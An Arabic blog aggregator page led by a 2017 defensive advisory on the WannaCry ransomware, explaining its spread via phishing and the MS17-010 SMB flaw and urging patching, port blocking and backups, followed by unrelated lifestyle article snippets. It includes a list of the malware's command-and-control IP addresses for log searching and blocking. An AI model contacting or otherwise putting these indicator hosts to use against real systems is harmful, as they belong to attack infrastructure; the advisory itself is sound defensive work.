٥- قم بإرسال بريد إلكتروني لموظفين شركتك توضح لهم فيها أن لا يقوموا بفتح اي بريد الكتروني به مرفقات مطلقااا الا اذا كانوا متأكدين من مصدر الرساله وهو شخص موثوق مائه بالمائه.
٦- بالطبع يتوجب عليك نسخ ملفاتك المهمه بشكل دائم حتي تتفادي مثل هذا النوع من الفيروسات ويمكنك استرجاع ملفاتك في اي وقت.
٧- هذه القائمة تحتوي جميع الهاشات الخاصه بملفات الفيروس ويمكنك ايضا استعمالها للتأكد من سلامة انظمة واجهزة شركتك من هذا الفيروس كالبحث بها علي اي Endpoint monitoring solutions خاص بشركتك:
http://ift.tt/2pu36lt
مراجع هامة يمكن قرآئتها:
by ابراهيم حجازي via مجتمع الحماية العربي
فيروس الفديه WannaCry وكيف تنقذ مؤسستك منه قبل فوات الأوان
السلام عليكم إخواني الكرام,
انتشر وبشدة فيروس WannaCry منذ البارحه كالنار في الهشيم وأصاب اكثر من 40000 الف جهاز كمبيوتر في حوالي 74 دولة حول العالم ما بين مؤسسات حكومية و ما يقرب من 16 مستشفي في إنجلترا ومن المؤسف تعليق أحد الدكاترة بأحد المستشفيات التي اصيبت انظمتها بهذا الفيروس علي موقع الجارديان قائلا بأن جميع العمليات توقفت في المستشفي منذ الواحده مساء وتم حذف جميع سجلات المرضي ونتائج الفحص وأن حياة أشخاص كثيرون علي المحك بسب هذه الكارثه وبالتأكيد سيكون هناك موتي جراء إنتشار هذا الفيروس!!!
مرورا بأكبر شركة اتصالات في إسبانيا وغيرها من الأهداف التي اصيبت بهذا الفيروس حتي ان وزارة الداخلية الروسية لم تسلم. لذا قررنا علي وجه السرعة كتابة مقال يتلخص في جزأين. ما اللذي نعرفه عن الفيروس وماذا يتوجب عليك فعله لتحمي مؤسستك او شركتك التي تعمل بها قبل فوات الأوان.
ما اللذي نعرفه عن الفيروس حتي الآن:
1- الفيروس مثله كمثل اي فيروس فديه أخر يقوم بتشفير ملفات جهازك ويطلب منك مبلغ 300 دولار حتي يمكنك استرجاع ملفاتك مره اخري
2- هذا الفيروس يقوم بالإنتشار من خلال رسائل تصيد Phishing EMails يتم ارسالها لملايين الإميلات بشكل عشوائي ويحتوي الإميل المرسل علي ملف مرفق عندما يتم فتحه يقوم بتنزل فيروس الفديةWannaCry
3- من الطرق التي يستخدمها الفيروس أيضا هي عملية الفحص العشوائي للعناوين IP Addresses فيقوم بانشاء ايبي عشوائي ومن ثم فحص اذا ما كان port 445 مفتوح علي هذا الايبي ام لا وهو البورت المستخدم بواسطة خدمة مشاركة الملفات SMB فاذا وجد ايبي مفتوح فيه هذا البورت يقوم بفحص جميع الايبيهات التي علي نفس الشبكه ويحاول استغلال ثغرة MS17-010 عليهم جميعا.
4- بعد ان يقوم الفيروس بالنزول علي جهاز الضحيه واصابته يقوم مباشرة بفحص كل الايبيهات الموجوده علي الشبكه باحثا عن اي جهاز يستخدم port 445 الخاص بخدمة مشاركة الملفات SMB Service
5- اذا وجد اي جهاز علي الشبكه يستخدم خدمة مشاركة الملفات فانه يقوم بإستغلال الثغرة الخطيرة التي تم الاعلان عنها عقب تسريبها من فريق الأمن القومي الأمريكي NSA بواسطة فريق ShadowBrokers والثغره معروفه باسم MS17-010 وهي ثغره تصيب كل أنظمة الوندوز وتمكن المخترق من إختراق اي جهاز تعمل عليه خدمة مشاركة الملفات SMB
6- ولان خدمة مشاركة الملفات منتشره في كل الشركات وحتي اغلب الشبكات الخاصه فبهذه الطريقه انتشر الفيروس كالنار في الهشيم في اكثر من اربعه وسبعين دوله حول العالم في وقت قياسي
7- من بين الدول المصابه بالفيروس هي ألمانيا, روسيا, إنجلترا, أسبانيا, أمريكا, الأرجنتين وغيرها من الدول العربية أيضا التي لم تسلم من ذلك الفيروس
8- وللاسف تم الإبلاغ عن انتشار موسع للفيروس داخل 16 مستشفي في إنجلترا وتعطل انظمة تلك المستشفيات بسبب أن الفيروس قام بتشفير سجلات المرضي ولا يمكنهم استقبال اي حالات جديدة
ما اللذي يتوجب عليك فعله:
١- قم فوراا بعمل تحديث لجميع أنظمة الوندوز داخل شركتك لتتأكد من ترقيع ثغرة MS17-010 والتي هي السبب الرئيسي في عملية الإختراق وانتشار الفيروس
اذا كان لاي سبب لديك مشكله في تحديث الوندوز فيمكنك استخدام تلك الأداه التي نشرتها شركة Symantec وتشغيلها بصلاحية administrator علي جهازك وسيقوم بعدها جهازك بإعادة التشغيل وتكون الثغره قد تم ترقيعها في جهازك
اما للشركات والبنوك وغيرها من المؤسسات فننصح بشده بعمل تحديث لجميع اجهزة وسرفرات الشركة مباشرة.
٢- تأكد من أن جميع أجهزة شركتك منصب عليها برنامج مضاد فيروسات وعليه جميع التحديثات لتضمن بأن بيانات هذا الفيروس file signatures موجوده في مضاد الفيروسات الخاص بك ليقوم بايقاف اي محاوله من الفيروس الدخول الي اجهزة الشركه
٣- اذا كان لدي شركتك اي سرفرات متصلة بالانترنت فتأكد من ان port 445 و port 139 لا يمكن الوصول اليهم من خارج شكبتك او من خلال الانترنت بصورة عامة
٤- المخترقين يقومون باستخدام الايبيهات التاليه للتحكم في الفيروس او في الاجهزه المخترقه لذا ننصح وبشدة أن تقوم بالبحث داخل ال SIEM Solution الخاص بشركتك عن اي سجلات logs لها علاقه بهذه الايبيهات واذا لم يكن لدي شركتك SIEM Solution فيمكنك البحث في السجلات الخاصه بال Proxy او DNS Logs
الخاصه بشركتك عن تلك الايبيهات للتأكد من ان أجهزة شركتك لم يصيبها هذا الفيروس
213.61.66.116
171.25.193.9
163.172.35.247
128.31.0.39
185.97.32.18
178.62.173.203
136.243.176.148
217.172.190.251
94.23.173.93
50.7.151.47
83.162.202.182
163.172.185.132
163.172.153.12
62.138.7.231
188.166.23.127
193.23.244.244
2.3.69.209
146.0.32.144
50.7.161.218
217.79.179.77
212.47.232.237
81.30.158.223
79.172.193.32
89.45.235.21
38.229.72.16
188.138.33.220
ننصح أيضا بإضافة هذه القائمة من الأيبيهات الي ال IPS الخاص بشركتك او وضعهم علي قائمة الحظر.
٥- قم بإرسال بريد إلكتروني لموظفين شركتك توضح لهم فيها أن لا يقوموا بفتح اي بريد الكتروني به مرفقات مطلقااا الا اذا كانوا متأكدين من مصدر الرساله وهو شخص موثوق مائه بالمائه
٦- بالطبع يتوجب عليك نسخ ملفاتك المهمه بشكل دائم حتي تتفادي مثل هذا النوع من الفيروسات ويمكنك استرجاع ملفاتك في اي وقت.
٧- هذه القائمة تحتوي جميع الهاشات الخاصه بملفات الفيروس ويمكنك ايضا استعمالها للتأكد من سلامة انظمة واجهزة شركتك من هذا الفيروس:
http://ift.tt/2pu36lt
مراجع هامة يمكن قرآئتها:
http://ift.tt/2ptNGOf
http://ift.tt/2r7XUQP
by ابراهيم حجازي via مجتمع الحماية العربي
الأربعاء، 3 مايو 2017
الأربعاء، 26 أبريل 2017
الاثنين، 24 أبريل 2017
الأحد، 16 أبريل 2017
أسباب تُعجل في تمرير طلبك للحصول على وظيفة/ سيرتك الذّاتية إلى سلة المهملات
by يوغرطة بن علي (Youghourta Benali) via المجلة التقنية
الجمعة، 7 أبريل 2017
الأربعاء، 29 مارس 2017
السبت، 25 مارس 2017
الثلاثاء، 21 مارس 2017
الخميس، 16 مارس 2017
الثلاثاء، 14 مارس 2017
كيف تتخلص من البثور التي تظهر في الوجه؟
في حين أنه أصبح هناك طرق للتخلص من حب الشباب، إلى أن هناك بعض البثور التي يمكن أن تظهر في أسوأ الأوقات، سواء كان ذلك بسبب إجهاد، أو هرمونات، أو حتى سوء تغذية، لذا لا يجب عليك أن تدع مجال لذلك أن يحدث، في مقالنا هذا سنقوم بتقديم عدد من توليفات طبيعية تساعد على التخلص […]
The post كيف تتخلص من البثور التي تظهر في الوجه؟ appeared first on مجلة نقطة العلمية.
by Rami via مجلة نقطة العلمية
السبت، 11 مارس 2017
كيف تتخلص من رائحة المنزل الكريهة في خطوات بسيطة؟
رائحة المنزل تعتبر من أهم الدلائل على نظافته ومدى الاهتمام به، ولكن أحياناً كثيرة ما تواجهنا مشكلة انبعاث روائح كريهة غير مرغوب بها، وأحياناً غير معروف مصدرها، مما يسبب لنا الإزعاج وأحياناً الإحراج بسبب تلك الروائح الغريبة. في هذا المقال نقدم لك بعض النصائح التي ستساعدك بفاعلية كبيرة في التخلص من مشكلة الروائح الكريهة بالمنزل. […]
The post كيف تتخلص من رائحة المنزل الكريهة في خطوات بسيطة؟ appeared first on مجلة نقطة العلمية.
by Rami via مجلة نقطة العلمية
كيف تقوم بهضم طعامك بشكل أسرع وأكثر صحية؟
يعتبر الهضم من العمليات الطبيعية التي يمارسها جسم الإنسان بشكل يومي، هي ببساطة تحويل الطعام إلى أجزاء أصغر، حتى تسمح لجسمك بالاستفادة بأكبر قدر ممكن الفوائد الغذائية وإنتاج أكبر كمية طاقة ممكنة، وبالتأكيد تختلف سرعة هضم الأطعمة على حسب كمية ونوع الطعام، وأيضاً تعتمد بشكل كبير على طبيعة هضم جسم كل شخص، في مقالنا هذا، سنقوم […]
The post كيف تقوم بهضم طعامك بشكل أسرع وأكثر صحية؟ appeared first on مجلة نقطة العلمية.
by Rami via مجلة نقطة العلمية
كيف تشعل نار إذا كنت في البرية من دون أن تحتاج إلى أعواد ثقاب أو قداحة؟
تعتبر القدرة على إشعال النار أحد أساسيات البقاء في الحياة البرية، فماذا ستفعل إذا كنت ذاهباً في مخيم مع أصدقائك، وأسقط أحدهم أعواد الثقاب في النهر، أو أضاع القداحة؟، عليك أن تتعلم طريقة لإشعال النار من دون الحاجة إلى أي أداة، و باستعمال أشياء بدائية موجودة حولك، في مقالنا هذا سنقوم بإيضاح عدة طرق ستساعدك على […]
The post كيف تشعل نار إذا كنت في البرية من دون أن تحتاج إلى أعواد ثقاب أو قداحة؟ appeared first on مجلة نقطة العلمية.
by Rami via مجلة نقطة العلمية
الخميس، 2 مارس 2017
كيف تملأ وقت فراغك بأشياء مفيدة؟
تتيح لنا تلك التغيرات المفاجئة في حياتنا فرصة كبيرة للحصول على وقت فراغ ما في يومنا، وذلك يرجع إلى تغير في نمط حياتنا، مثل التقاعد، التخرج من المدرسة أو الجامعة، أو حتى أن يتركك أولادك ليبدأوا حياتهم في مكان آخر، لذا في معظم الحالات، يتوجب عليك أن تملأ وقت فراغك، حتى لا تشعر بالملل، ولكي […]
The post كيف تملأ وقت فراغك بأشياء مفيدة؟ appeared first on مجلة نقطة العلمية.
by Rami via مجلة نقطة العلمية
الأربعاء، 1 مارس 2017
كيف تتغلب على الاكتئاب؟
حسب تعريف المعهد الأمريكي للصحة العقلية، فإن الاكتئاب عبارة عن “خلل في سائر الجسم، يشمل الجسم والأفكار والمزاج، ويؤثر على نظرة الإنسان لنفسه، ولمن حوله من أشخاص، ولما يحدث حوله، بحيث يفقد المريض اتزانه الجسدي والنفسي والعاطفي”. التغلب على الاكتئاب لن يكون أمراً سهلاً أو بسيطاً، ولكنه أيضاً ليس مستحيلاً، لن يمكنك إقناع نفسك ببساطة […]
The post كيف تتغلب على الاكتئاب؟ appeared first on مجلة نقطة العلمية.
by Rami via مجلة نقطة العلمية
السبت، 25 فبراير 2017
الخميس، 23 فبراير 2017
كيف تتخلص من عادة التدخين الضارة للأبد؟
جميعنا على دراية تامة بأضرار التدخين السيئة وتدميرها للصحة، لكن لا يمنع هذا المدخنين من التمسك بهذه العادة السيئة. يعتبر الإقلاع عن عادة التدخين تحدي صعب للبعض، سواء كنت مدخناً شاباً أو رجلاً عجوزاً مدخناً طوال حياته، حيث أن النيكوتين الموجود في السجائر يمكنه ببساطة أن يوفر لك طريقة سهلة وسريعة في إراحة أعصابك، الحد من توترك […]
The post كيف تتخلص من عادة التدخين الضارة للأبد؟ appeared first on مجلة نقطة العلمية.
by Rami via مجلة نقطة العلمية
كيف تتخلص من أحلامك المزعجة؟
يمكن للكوابيس أن تكون مزعجة جداً، فتسبب لنا الخوف والقلق، وتؤثر سلباً على نومنا، مما يؤدي ذلك إلى التعب الجسدي والضغط النفسي، لذلك يتوجب علينا أن نفهم أسباب كوابيسنا جيداً قبل أن نتعامل معها، في مقالنا هذا سنبدأ بفهم أسباب الكوابيس ومن ثم نبدأ في التعامل معها بشكل صحيح. لنبدأ أولاً بفهم كوابيسنا، من الطبيعي […]
The post كيف تتخلص من أحلامك المزعجة؟ appeared first on مجلة نقطة العلمية.
by Rami via مجلة نقطة العلمية
كيف تحدد الاتجاهات بدون بوصلة ؟
تعلمنا منذ الصغر الاتجاهات الأربعة، الشمال والجنوب والشرق والغرب. وكانوا يرسمون في حصص الجغرافيا بوصلة على ركن الخريطة حتى نستطيع تحديد موقع كل مكان أو مدينة فنقول هذه المدينة تقع في جنوب شرق مدينة كذا. أصبحت البوصلة هي الأداة البسيطة العبقرية التي سهلت علينا معرفة المواقع والاتجاهات و أصبح وجودها أمراً لا غنى عنه. والسؤال هنا، هل تتخيلون الحياة في زماننا […]
The post كيف تحدد الاتجاهات بدون بوصلة ؟ appeared first on مجلة نقطة العلمية.
by Rami via مجلة نقطة العلمية
الاثنين، 20 فبراير 2017
كيف تحافظ على لياقتك البدنية من دون الحاجة إلى تمارين رياضية
وجد الباحثون في جامعة بنسلفانيا، في كلية الطب، طريقة ما نجحت في إبقاء فئران التجارب في كامل صحتهم من دون الحاجة إلى التمرين، وبالتأكيد لا يمكن أن تكون هذه الطريقة مفيدة إذا حاولنا تطبيقها على الإنسان، فلا يوجد طريقة للبقاء صحياً بشكل كامل من دون القيام بأي نشاط رياضي، لكن ما يمكن فعله حقاً هو […]
The post كيف تحافظ على لياقتك البدنية من دون الحاجة إلى تمارين رياضية appeared first on مجلة نقطة العلمية.
by Rami via مجلة نقطة العلمية
كيف تجعل غرفة صغيرة تبدو كبيرة ومريحة
مساحة صغيرة؟ هذا لا يعني أن يكون المكان ضيق، في مقالنا هذا سوف نقدم لكم بعض الحيل لجعل المكان يبدو كبيراً ومرحباً بأي عدد من الأشخاص. إستغل الفراغات، وضع الأثاث، أو “حشوه” ملصقاً للجدران لا ينبغي أن يوفر لك مساحة كبيرة، حاول أن تصنع فراغاً بين قطعك المفضلة، يمكنك أن تضع أريكة “كنبة” في منتصف الغرفة، مع […]
The post كيف تجعل غرفة صغيرة تبدو كبيرة ومريحة appeared first on مجلة نقطة العلمية.
by Rami via مجلة نقطة العلمية
السبت، 18 فبراير 2017
كيف تتخلص من أعراض الانفلونزا دون الحاجة إلى أدوية طبية
تعلمنا جميعاً أن الأنفلونزا هي عدوى فيروسية تصيب الجهاز التنفسي في المقام الأول، و عادة ما تمتد دورته لمدة تصل لحوالي أسبوع ولا تتطلب تدخلات خطيرة. وقد تشمل أعراض الانفلونزا : الحمى -إرتفاع درجات الحرارة- فقد تصل إلى 100 درجة فهرنهايت (37.8 درجة مئوية) أو أعلى، القشعريرة، السعال، إلتهاب الحلق، إنسداد أو سيلان الأنف، الصداع، […]
The post كيف تتخلص من أعراض الانفلونزا دون الحاجة إلى أدوية طبية appeared first on مجلة نقطة العلمية.
by Rami via مجلة نقطة العلمية
كيف تبقى حيوياً من دون الحصول على قسط كافي من النوم
التعب والإرهاق هم أكبر الآثار الجانبية لعدم الحصول على قسط كافي من النوم، وأكثرهم حدوثاً. لكن لحسن الحظ يوجد عدة طرق للحصول على القدر الكافي من الطاقة التي نحتاجها لنكمل اليوم. قم بإستخدام أشعة الشمس في صالحك، أشعة الشمس وغيرها من الأضواء الساطعة في منزلك يمكنها أن ترسل إشارات لجسدك أنه قد حان وقت الاستيقاظ، وذلك عن […]
The post كيف تبقى حيوياً من دون الحصول على قسط كافي من النوم appeared first on مجلة نقطة العلمية.
by Rami via مجلة نقطة العلمية
الأربعاء، 8 فبراير 2017
الثلاثاء، 7 فبراير 2017
الاثنين، 6 فبراير 2017
الاثنين، 30 يناير 2017
الشاي الأخضر يساعد على قتل الخلايا السرطانية الفموية
كانت الدراسات السابقة قد بينت بأن الشاي الأخضر يمكنه استهداف خلايا سرطان البنكرياس، ولكن دراسة جديدة تشير إلى أن فوائد هذا المشروب السحري لا تنحصر بهذا النوع من السرطانات فقط، فتبعاً للدراسة جديدة التي تم إجراؤها من قبل باحثي جامعة ولاية بنسلفانيا، فإن مضادات الأكسدة الرئيسية التي توجد في الشاي الأخضر، مثل اليبيغاللوكاتيشين-3-غالاتي (EGCG)، تساعد […]
The post الشاي الأخضر يساعد على قتل الخلايا السرطانية الفموية appeared first on مجلة نقطة العلمية.
by نقطة via مجلة نقطة العلمية
كيف يمكن لاستخدام الأضواء الاصطناعية في الليل أن يؤثر على صحتنا؟
معظم الأشخاص اليوم لا يحصلون على القسط الذي يكفيهم من النوم، وتبعاً لمراكز السيطرة على الأمراض والوقاية منها (CDC) فإن عدم الحصول على ما يكفي من النوم قد أصبح وباءً، ولكن في حين أننا أصبحنا نولي اهتماماً أكبر لأهمية النوم، فإن الظلام لا يزال حاجة يتجاهلها معظمنا. إن المرور بأنماط منتظمة من الضوء والظلام ينظم […]
The post كيف يمكن لاستخدام الأضواء الاصطناعية في الليل أن يؤثر على صحتنا؟ appeared first on مجلة نقطة العلمية.
by نقطة via مجلة نقطة العلمية